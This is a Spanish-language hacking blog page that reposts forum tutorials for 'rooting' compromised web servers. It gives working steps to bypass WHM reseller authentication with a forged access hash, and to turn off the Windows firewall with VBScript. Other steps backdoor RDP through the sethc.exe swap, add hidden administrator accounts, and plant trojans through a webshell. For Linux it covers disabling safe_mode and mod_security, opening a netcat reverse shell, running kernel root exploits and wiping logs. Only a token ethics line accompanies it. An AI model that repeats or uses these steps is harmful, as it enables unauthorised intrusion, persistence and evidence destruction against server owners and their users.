Banner 1

Mostrando entradas con la etiqueta rooteo. Mostrar todas las entradas
Mostrando entradas con la etiqueta rooteo. Mostrar todas las entradas

Bypass WHM Panel [Autentificación] [RESELLER]

0 comentarios
Bueno hare un este pequeño tutorial que sirve para rooter un reseller con suma facilidad y sin tanto predicamento...

¿Como identificar si es una Cuenta Reseller?
En tu shell puedes ver en "public_html"; 2 carpetas con nombres como:" moving.page" y "suspended.page".




Luego de verificar que es un host reseller valla ha public_html



Luego ve hacia /home/reseller/.accesshash y si no existe crealo.



/home/reseller/.accesshash <- 123456="" br="" plain="" text="">

Despues usando algun programa o algo para modificar las cabeceras HTTP como Modify Headers.

Presionen el boton de START (Encendido), y luego agregen este nombre HTTP y su valor



Name : "Authorization"
Value : "WHM reseller:123456"

Luego vamos a el WHM Panel con el usuario y la password que pusieron en mi caso 123456 con el usuario reseller. Con la clave que se coloco en "Accesshash".

 Fuente: http://www.masters-hackers.info/showthread.php?t=30683


2/2 - Rootear Servidores Windows

0 comentarios
la segunda parte de esta gran trabajo.

------------------------------------------------------------------------------------------------------

Rooteando Servidores Windows

Buenas Grin
Esta es la segunda parte del tutorial 1/2 Rootear Servidores Linux o Unix, en esta segunda parte como bien dice el título se tratará sobre los servidores Windows.
Como ya ha sido explicado en el primer tuto no voy a volver a explicar lo que es el Rooteo ni nada referente a las WebShell, permisos, ni directivas PHP.
Cabe destacar que teniendo una WebShell en un servidor Windows es como tener total control de la Shell de Windows, ya que podemos ejecutar cualquier tipo de orden mediante la WebShell.


1 - 50% de posibilidades.
2 - Bypasseando el Firewall.
3 - Backdoorizando (Terminal Server).
4 - Accediendo como SYSYEM (root de Windows).
5 - Terminal Server sin usuario SYSTEM (Alternativa).
6 - Troyanizando (Alternativa).



1 - 50% de posibilidades


¿50%?
Si, el cincuenta por ciento de posibilidades que tenemos para que todo salga, o todo no salga (suponiendo que ya hayamos bypasseado lo que debamos haber bypasseado).
¿Por qué esto es así?
Esto es así debido que la persona que haya montado el servidor o servidores haya decidido correrlos con una cuenta Limitada o una de Administrador.
Para poder realizar el rooteo, nos debe haber tocado una cuenta de Administrador (lo más normal es que sí).
La siguiente imagen lo explica:


Como podemos ver, necesitamos por lo menos Instalar programas y hardware ,realizar cambios en todo el sistema y crear cuentas de usuario (esta es opcional).

2 - Bypasseando el Firewall


Bueno, esto no es muy dificil, ya que simplemente deberemos ejecutar un script Visual Basic Script (VBScript).
Abrimos un editor de texto, y pegamos el siguiente code VBS:
Código: [Seleccionar]
Set objFirewall = CreateObject("HNetCfg.FwMgr")
Set objPolicy = objFirewall.LocalPolicy.CurrentProfile
objPolicy.FirewallEnabled = false

Este code lo guardamos como, firewall.vbs.
Ahora solo debemos subirlo mediante la WebShell al directorio que sea, y en ese mismo directorio ejecutar esto en la entrada de comandos de la WebShell:
Código: [Seleccionar]
rutadelarchivo\firewall.vbs

Es decir, imaginemos que hemos viajado hasta el disco C: :
Código: [Seleccionar]
C:\firewall.vbs

Chao Firewall :dedo: !

3 - Backdoorizando (Terminal Server)


Bien, esto consiste en habilitarle el servidor de Terminal Server, Escritorio Remoto de Windows en otras palabras, y de paso cambiarle sethc.exe por cmd.exe.
Para ello podeis echar un vistazo al tutorial que hizo hace tiempo 3D1, Manual - Hackear por Escritorio Remoto de Windows (Por Puerto 3389).
Lo seguis hasta el paso 2.1), y copiais el segundo code, lo guardais como backdoor.bat y ya Grin

Cuando esté el .bat listo, simplemente habrá que subirlo mediante la WebShell al directorio que se quiera y hacer lo mismo que con el VBScript:
Código: [Seleccionar]
rutadelarchivo\backdoor.bat

En caso de estar en C: :
Código: [Seleccionar]
C:\backdoor.bat

Ahora rezemos porque se haya abierto el puerto en el Router Undecided
:cura: Padre nuestro que estás en bla bla bla... :cura:

4 - Accediendo como SYSYEM (root de Windows)


Si se ha backdoorizado correctamente y nuestro señor nos ha abierto el puerto en el Router (XD), bastaría con hacerle una visitita con nuestro cliente de escritorio remoto o rdesktop de Linux.
En el caso que estemos en Windows:
Inicio, ejecutar, mstsc.exe o Iinicio\Todos los Programas\Accesorios\Comunicaciones\Conexion a Escritorio Remoto.
En ese menú, le damos al botón [Opciones >>]
Luego nos pasamos a la pestaña "Recursos locales"
y cambiamos solo la opcion "Teclado", desplegamos la lista y seleccionamos "En el equipo remoto".
En el caso de Linux no hay que configurar eso, ya que siempre se ejecuta en el equipo remoto.

Llegó la hora de la verdad... Tongue
Abriremos nuestra consola y haremos un ping a la web, de forma que nos devuelva la Ip del servidor en el que se aloja y hemos backdoorizado.

Citar
ping www.pagina.com
Haciendo ping a www.pagina.com [123.123.123.123] con 32 bytes de datos:

Respuesta desde 123.123.123.123: bytes=32 tiempo=71ms TTL=246
Respuesta desde 123.123.123.123: bytes=32 tiempo=56ms TTL=246
Respuesta desde 123.123.123.123: bytes=32 tiempo=62ms TTL=246
Respuesta desde 123.123.123.123: bytes=32 tiempo=62ms TTL=246

Estadísticas de ping para 123.123.123.123:
Paquetes: enviados = 4, recibidos = 4, perdidos = 0
(0% perdidos),
Tiempos aproximados de ida y vuelta en milisegundos:
Mínimo = 56ms, Máximo = 71ms, Media = 62ms
Eso en Win, en Linux es igual.
Bueno, a nosotros nos interesa la parte roja, que es la Ip del servidor en el que se aloja la Web.
Esa es la Ip que debemos introducir en el cliente de escritorio remoto.
En Windows con el cliente abierto:
Código: [Seleccionar]
Equipo:  [123.123.123.123]
[Conectar]
Simplemente le damos a conectar.
En Linux abrimos una terminal e introducimos:
Código: [Seleccionar]
rdesktop 123.123.123.123

Bueno, si el señor fué bueno y nos abrio el puerto en el Router, deberiamos estar en el Logon de Windows, donde nos pide un usuario y una password.
Aunque no la sepamos, como habíamos Backdoorizado con el .bat de 3D1, al presionar 5 veces la tecla shift:

Se nos abrirá una consola situada en la raíz del systema, osease, system32...
Povale, que bien XD.

¿Pero donde está el SYSTEM?
Bueno, si quereis enteraros de como funciona la cosa clickead aquí, si quereis ahorrar el paso de leerlo haced lo siguiente:

Situados en la Consola que se abrio en el Logon del servidor, teclead explorer.exe, y bueno, lo que pasa en windows es que al haber abierto una Consola sin que haya sido abierta desde el menu ejecutar, herramientas en el inicio, o desde la carpeta system32, se abrira con el nombre de svchost.exe, y al ejecutar el proceso explorer, se abrirá el escritorio y nuestro usuario será SYSTEM, que viene a ser algo así como el root de Windows, ojo, que no es un root como el de Linux o Unix, es un root oculto que en principio no se debería saber de él ( Shocked somos kakers que nos saltamos la ley Shocked)

Bueo, a la cosa, ejecutamos explorer.exe y se nos abrira el escritorio...
Pulsamos el boton de la tecla inicio, miramos el usuario...
¡SYSTEM!
¡Somos root en windows sin necesidad de root exploits!
Ya podeis si quereis cerrar la consola, teclear Alt Ctrl Supr y en la pestaña procesos cerrar winlogon.exe, que sino se nos quedará de fondo de pantalla lo de meter el usuario y password Tongue

5 - Terminal Server sin usuario SYSTEM


¿Qué quiere decir esto?
Pues que para realizar esta conexión, no vamos a sustituir sethc.exe por cmd.exe, sino que vamos a hacer una conexión normal.
Para esto, se debe de crear un bat que habilite Terminal Server (Escritorio Remoto de Windows) de la siguiente manera:
Código: [Seleccionar]
reg delete "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnect ions /f
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnect ions /t "REG_DWORD" /d 0
Sacado del tuto de 3D1.
Borra la clave del registro que bloquea las conexiones entranter de Terminal Server y crea una clave que las acepta.
Eso lo guardamos como escritorio.bat.
Entonces hacemos mano de nuestra WebShell, subimos el bat y hacemos lo siguiente:
Código: [Seleccionar]
rutadelbat\escritorio.bat

Es decir, si lo hemos subido en C: :
Código: [Seleccionar]
C:\escritorio.bat

Bueno, con eso se supone que el servidor de termial server está activo en el servidor remoto.
Ahora tenemos que crear un usuario con derechos de administador para poder conectarnos.
Vamos a la entrada de comandos de la WebShell y escribimos:
Código: [Seleccionar]
Net User Nombre Contraseña /add

Por ejemplo, si de nombre le queremos poner messerschmitt y de contraseña 123456:
Código: [Seleccionar]
Net User messerschmitt 123456 /add

Vale, ya hemos creado un usuario, pero todavía no tiene privilegios de administrador, para dárselos, hacemos lo siguiente:
Código: [Seleccionar]
Net Localgroup Administrators Nombre /add

Si el usuario que hemos creado es messerschmitt:
Código: [Seleccionar]
Net Localgroup Administrators messerschmitt /add

Bueno, como ya tenemos el Terminal Server activo y corriendo, y un usuario con privilegios de adminstrador, solo queda conectarnos vía Escritorio Remoto, poner de nombre messerschmitt y contraseña 123456, y boilá, tenemos el servidor en nuestras manos Cheesy

6 - Troyanizando


Bueno, esta parte es la más fácil y lammer con menos mérito.
Simplemente hay que hacer mano de la WebShell, subir nuestro troyano, y ejecutarlo mediante la entrada de comandos:
Código: [Seleccionar]
rutadeltroyano\server.exe

Es decir, si lo hemos subido a C: :
Código: [Seleccionar]
C:\server.exe

Y boilá, hemos infectado un servidor remoto sin necesidad de tratar con el dueño por msn Grin
Aunque personalmente prefiero todo el método de backdoorizar y acceder como SYSTEM, que aunque sea más largo y tedioso es la verdadera forma de hacer las cosas bien, enterandote de cómo son Smiley


Un saludo Wink

FUENTE:http://argeniverso.66ghz.com/index.php?

Aprovechen al maximo la libertad de informacion pero siempre con la etica que se merece.

saludos roboticos

1/2 - Rootear servidores Linux

1 comentarios
este tal vez sea uno de los temas principales para la seguridad web y porque no..para los desfacers.

Les recuerdo que la informacion es para aprovecharla al maximo osea aprender , practicar , profundizar y generar nuevas cosas mas no para andar dañando paginas por internet...pero bueno cada uno con sus gustos.

Les recuerdo que lo encontre via argeniverso , me parese que es una gran comunidad.
--------------------------------------------------------------------------------------------------

Rooteando Servidores Linux


Buenas noches Grin
Pprimera parte de lo que son dos tutoriales enfocados al rooteo de servidor Linux y Windows.
En la primera entrega se tratarán temas relacionados con el Rooteo de servidores Linux.
Antes de todo, este tuto no explica como alojar, montar, o subir una shell a una web, para eso están las FAQ de Vulnerabilidades y Exploits, cuando tengamos una shell montada hay muchos factores que nos impediran poder sacarle partido, ejemplo de estar con un usuario sin ningun tipo de privilegio, por lo menos debemos tener de Lectura, Escritura, y Ejecucion para poder conseguir rootear adecuadamente.


1 - ¿Que es el Rooteo?
2 - ¿Que son las WebShells?
3 - Permisos.
4 - Directiva PHP: safe_mode y forma de aludirla.
5 - Consiguiendo una Shell Inversa.
6 - Kernel Attack.
7 - Borrando logs: zapper en perl.


1 - ¿Que es el Rooteo?


Bien, el Rooteo proviene de la palabra Root, que en ámbitos Linux o Unix se refiere a un Super Usuario el cual posee y ejerce todos los poderes sobre un sistema, tiene permisos de lectura, escritura, ejecución... bajo cualquier circunstancia, de lo que se deduce:
Rooteo = Administrar un sistema con todo privilegio.
El rooteo se realiza mediante el uso de una WebShell (explicado lo que es más abajo), ya haya sido alojada mediante SQLi, RFI, LFI, Xss, hasta un Ataque Flash

2 - ¿Que es una WebShell?


Como su nombre nos indica, Web (de página web) y Shell (línea de comando), es una línea de comando alojada sobre una web que permite ejecutar código (comandos de toda la vida, rm, ls, ping, etc [en linux]) sobre el servidor en el que está alojada.
Están programadas en PHP, gracias a esa funcion de PHP permiten ejecutar código sobre el servidor.
Existen muchas y muy conocidas, C99, R57, Locus, Ajax, N3tSh3ll, en fin, una infinidad, a la hora de trabajar con ellas son muy intuitivas, es como manejarse en un WebFtp pero con más "pecaminosas funciones" :fuma:

3 - Permisos


Cuando estamos en una WebShell, a la derecha de cada archivo vemos unas letras de este tipo, drwx-r-x

r - Lectura
x - Ejecución
d - Directorio
w - Escritura
- - No hay permiso


4 - Directiva PHP: safe_mode y forma de aludirla


Bien, este punto es muy importante cuando manejamos una WebShell, ya que es la directiva que nos va a dejar trabajar tranquilos, comprueba muchas cosas por razones de seguirdad, las cuales podeis saber que hacen aquí... Esta funcion viene deshabilitada por defecto, pero si os encontrais con ella activada haced lo siguiente:
La forma de aludirlo es subir al mismo path donde se encuentra nuestra WebShell un archivo de configuracion de directivas php, de nombre php y extensión .ini, es decir php.ini.
El código del .ini en cuestión es este:
Código: [Seleccionar]
register_globals = On
engine = On
safe_mode = Off
safe_mode_exec_dir = On
Safe_mode_include_dir = On
Bien, ya hemos mandado a paseo al safe_mode Smiley


Otra cosa, cuando esteis sobre un servidor que sea Apache (lo más normal es que si), tambien necesitareis aludir el mod_security que no se muy bien por qué todavía, cuando esta funcionando no me deja trabajar bien Undecided
En este caso, debemos buscar por todo el directorio de apache o de la web, un fichero que se llame .htaccess.
.htaccess (Acceso de Hiper-Texto) es el nombre por defecto del archivo de configuración de directorios de Apache. Provee de la habilidad para personalizar la configuración de las directivas definidas en el archivo de configuración principal. Las directivas de configuración necesitan estar en el contexto de .htaccess y el usuario necesita los permisos apropiados. Fuente
Bueno, en la WebShell haceis click, y dentro de el añadis (sin borrar nada) estas lineas de codigo (sin borrar nada XD):
Código: [Seleccionar]

SecFilterEngine OFF
SecFilterScanPort OFF
SecFilterCheckURLEncoding OFF
SecFilterCheckUnicodeEncoding OFF

5 - Consiguiendo una Shell Inversa


Bueno, esto de conseguir la Shell es opcional, pero es más comodo manejar la shell remota desde la nuestra.
Para eso nos haremos mano de NetCat Smiley

Shell Inversa


Aquí es donde entran en juego los BackDoors normalmente codeados en Perl.
En este mismo foro hay uno del FoS Team, BackDoor (Recomiendo leer bien el code s))
Bueno, su uso no es complicado, en el code como se puede ver tenemos dos if, depende de cual se declare al usar el BackDoor ejecutará /bin/sh (shell de linux) o cmd (shell de Windows) hacia el NetCat que esté a la escucha.
¿Que lio, verdad? Undecided
No es para tanto, lo que hace ese BackDoor, es enviar una Shell ya bien sea de Linux o Windows hacia la Ip y Puerto que le hayamos especificado, hace lo mismo que si ejecutasemos nc -d -e /bin/sh TuIp Puerto, pero la pega esque a veces NetCat no viene instalado en ese tipo de sistemas, pero si perl Grin

¿Como usarlo?
Pregunta de oro.
Es fácil, nosotros, al ser una shell inversa debemos abrir nuestra shell y colocar:
Código: [Seleccionar]
nc -v -L -p 80

Eso en nuestra shell, la que tenemos en Inicio, Ejecutar en el caso de Windows, y Aplicaciones, Accesorios en caso de Linux.
Guay, nosotros ya estamos escuchando con NetCat conexiones entrantes, ahora con el code previamente proporcionado (el del BackDoor BackFos) abrimos un editor de texto cualquiera y lo llamamos como queramos .pl, por ejemplo backfos.pl, lo subimos con la WebShell al directorio /tmp de Linux y lo ejecutamos como bien pone en el código.
Vuelvo a decir que recomiendo leer detenidamente el codigo del backdoor, por si acaso s)

Si todo sale bien deberiamos recibir la shell donde teniamos a NetCat escuchando.
Por ahora vamos bien, tenemos la Shell de un servidor Linux.
Peeeeeeeeeeeeeeeeeeero, no somos root, por lo cual estamos muy limitados, tenemos solo control parcial sobre el servidor.
Para remediar eso, debemos hacer lo que se denomina un Kernel Attack.

Kernel Attack


¿Qué es el Kernel?


Kernel es el Núcleo de un SO, es la parte más interna de un SO, la que permite hacer funcionar el HardWare, SoftWare, cargar Drivers, en Fin, lo fundamental para que una máquina funcione.
Una imagen vale más que mil palabras XD

Bueno, si sabemos que es el Kernel, sabremos que Kernel Attack es algo que ataca al Kernel para poder sacar beneficios.
Eso se realiza mediante Root Exploits, son exploits locales, es decir, que se los cambios se realizan donde fue ejecutado, no remotamente, normalmente programados en C que aprovechan una grave vulnerabilidad del Kernel que use un Sistema Operativo para conseguir dejarnos acceso como root.
Existe un exploit para casi todos los Kernel de Linux.
Para saber que Kernel (no SO) corre un Sistema Operativo Linux, deberemos cojer la shell que hemos recibido cuando escuchabamos y ejecutar lo siguiente:
Código: [Seleccionar]
uname -r
De lo que nos devolvería esto:
Código: [Seleccionar]
Linux hostname 2.6.24-19-server #1 SMP Sat Jul 12 00:40:01 UTC 2008 i686 GNU/Linux
Bien, examinemos lo que nos dijo:
Linux Hostname - Nombre del Servidor
2.6.24-19 - Versión de Kernel, eso es lo que nos Interesa.
Bien, ahora deberemos hacer mano de Google, e introducir una búsqueda tal que así:
2.6.24 kernel root exploit.
Bueno, cuando tengamos el Exploit, abriremos un editor de texto, pegaremos el code del Root Exploit, y lo guardaremos como lo que sea .c, ejemplo, root.c.
Bien, ahora tenemos que buscar en la WebShell un directorio donde tengamos permisos de ejecucion de archivos.
Leyendo por Internet ví que en /tmp normalmente hay permisos de ejecucion, lectura, escritura y todo eso, así que debemos de introducir:
Código: [Seleccionar]
cd /tmp
De forma que nos situemos en el directorio tmp de Linux.
Ahora agarramos la WebShell y en las opciones de abajo nos dirigimos a /tmp.
Aí dentro subimos nuestro root.c.
Volvemos a la otra shell y como ya estabamos situados en /tmp introducimos:
Código: [Seleccionar]
ls
Ahora nos debe mostrar todo lo que hay en ese directorio, debemos buscar root.c y hacer lo siguiente:
Introducimos todo en este orden:
Código: [Seleccionar]
gcc root.c -o rootexploit
Compilamos el code.

Código: [Seleccionar]
id
De lo que nos debe devolver uid=numeros(nombre), esa es la Id que teneis ahora, que no es root.

Código: [Seleccionar]
chmod -c 777 rootexploit
Damos permisos 777, lectura, escritura, ejecucion, etc, para que pueda realizar su cometido.
De lo que devolverá mode of 'rootexploit' changed to 0777 (rwxrwxrwx).

Código: [Seleccionar]
./rootexploit
Cuando haya terminado:

Código: [Seleccionar]
id
Si nos devuelve uid=0(root)...
¡Hemos Rooteado el servidor!
¡Lo estamos administrando!
¡Podemos incluso apagarlo!

7 - Borrando logs: zapper en perl


Como ahora ya tenemos permisos de escritura, lectura, ejecucion (root), podemos borrar los logs que quedaron estén en el directorio en el que estén, mediante este Zapper en Perl, Zapper.
Como ya sabemos, perl zapper.pl.

Saludos argeniverso! Cheesy

FUENTE:http://argeniverso.66ghz.com/index.php

saludos roboticos
Powered by Bad Robot
Helped by Blackubay